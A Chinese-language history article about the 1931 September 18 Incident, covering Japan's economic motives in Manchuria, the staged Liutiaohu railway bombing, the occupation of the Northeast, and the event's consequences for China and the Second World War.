而当时日本对外投资,大部分集中在满洲,在满洲的外国资本中,百分之七十以上是日本资本。除了苏联在北满的铁路及其附带投资外,满洲可以说乎是日本资本的独占市场。满洲的铁路是日本日本帝国主义的摇钱树。但是当时中国东北地区在日本杀了张作霖之后,他的儿子张学良接任后接受国民政府的领导,消灭日本想通过杀死张作霖使东北群龙无首而出现**的局面的阴谋。当时东北在东北爱国知识分子群体的组织下掀起了轰轰烈烈的反日救亡运动。在反日浪潮中,东北当局适时颁布一些政策,设法抵制日本在东北的权益,支持东北民众的反日斗争。东北地区反日救亡的民族主义热忱空前高涨,中日两国之间的关系变得紧张起来。日本在满洲的铁路经营也因此每况愈下,日本财阀强烈要求想办法把满蒙置于日本的统治之下。以便利用中国东北的资源和市场来摆脱经济危机。想要在东北获得最大的利益,通过政治很难在短期内获得,也很难获得,况且此时国内正处于经济危机,哪有时间通过“温柔”的政治手段获取。
想想东北就像一块肥肉,但是这块肉是别人的,日本只能摸但不能吃掉,当时日本已经饿得要死了,其他地方又找不到吃的,对于饥饿吃人肉的行为都可以做得出来,更何况是一个国家。此时最行得通的方式就是通过武力侵略东北获得。为了发动对东北的侵略战争,日本朝野大造舆论狂热的叫嚣中国东北是日本的生命线,必须使东北脱离中国而由日本直接统治。前满铁副总裁松岗洋右公然宣称:“满蒙问题是关系到我国生死存亡的问题,是我国的生命线。无论是国防上,还是经济上都是如此。”加上各种侵华言论的传播,民众在面对国内自救无望后更愿相信通过东北改变国内困境,使生活好转。这也正达到日本领导者的目的。想通过战争获得资源,同时又能转移民众的注意力。
九一八事变是中国的爱国主义和日本的爱国主义对决的产物。九一八事变和后来的日本侵华战争,都与当时日本国内弥漫着的“全民疯狂”式“爱国主义”狂潮有直接联系。日本侵华的背景,和英国、俄国等由政府高层冷静策划的对华殖民侵略,有很大的不同,这是我们应该注意到的。
九一八事变发生的地点
在中国近代史上的九月十八日的这一天,日本关东军成功制造了“柳条湖事件”,并以此为借口进一步发动了“九一八事变”,那么这一次的事件又发生在什么地方呢?
“九一八事变”不单单指的是沈阳地区,它更指的是整个东北地区。
在1931年的9月18日的夜晚十点多左右,在日本关东军的安排之下,铁道“守备队”中的一支下分队在精心策划下,成功的炸毁了沈阳柳条湖附近的由日本人修筑的南满铁路路轨,在事发之后,还栽赃嫁祸给了中国军队,称是中国人炸毁的铁路。其实际上日本就是要找任何一个借口,开始侵略中国。
之后,日军便以此为借口,开始光明正大的炮轰沈阳的北大营,这也就是中国近代史上著名的“九一八事变”。在事发后的第二日,日军就侵占沈阳地区,之后又陆续侵占了东北三省。直到在1932年2月份的时候,东北全境沦陷。所以说,对于“九一八事变”它发生在整个东北地区。在此之后,日本在中国东北建立了伪满洲国傀儡政权,开始了对东北人民长达之久的奴役和殖民统治。
而对于中国来说,这一次的事变,使得中国人民开始了长达14年之久的抗战战争。另外这一事件还标志着中国社会的性质开始转变,转变成为一个殖民地、半殖民地和半封建的社会。再者也使得中华民族得到了空前的觉悟和团结。
九一八事变背后的影响
揭开二战序幕
九一八事变是20世纪30年代初期发生在中国东北的震惊中外的重大历史事件。它不仅是日本帝国主义以武力征服中国的开始,也是法西斯国家在世界上点燃的第一把侵略战火,它的爆发标志着亚洲战争策源地的形成和第二次世界大战序幕的揭开,同时它打破了第一次世界大战后形成的相对稳定的世界格局。
社会性质转变
“九一八”事变后,中国东北沦为日本的殖民地,而且日本侵略逐步向华北地区扩展, 中国社会性质发生了变化,中华民族得到了空前的觉醒和团结。
民族团结抗日
九一八事变及时向全国人民敲起警钟,“中华民族到了最危险的时候!”越来越成为华夏儿女的共识。在民族危机感逐步加深的过程中,民族责任感也迅速提高,并付诸实践;许多爱国知识分子积极发表政见和主张,呼吁全国人民“彻底明了国难的真相!”“人人应视为与己有切肤之痛,以决死的精神,团结起来作积极的挣扎与苦斗”,广大民众和各界人士以各种形式积极投身抗日救亡运动。
国共两党是当时中国的两大政党,九一八事变后,随着中华民族的空前觉醒,民族团结也日益增强,两党的民族使命感迅速增强,有力的促进了两党的再次合作,从东北地区到西北地区,最后发展到全中国,终于开创了团结御侮,共同抵抗日本帝国主义的侵略的新局面,实现了民族大团结。
★事件报告
★事件反思
★中文简历
文档为doc格式
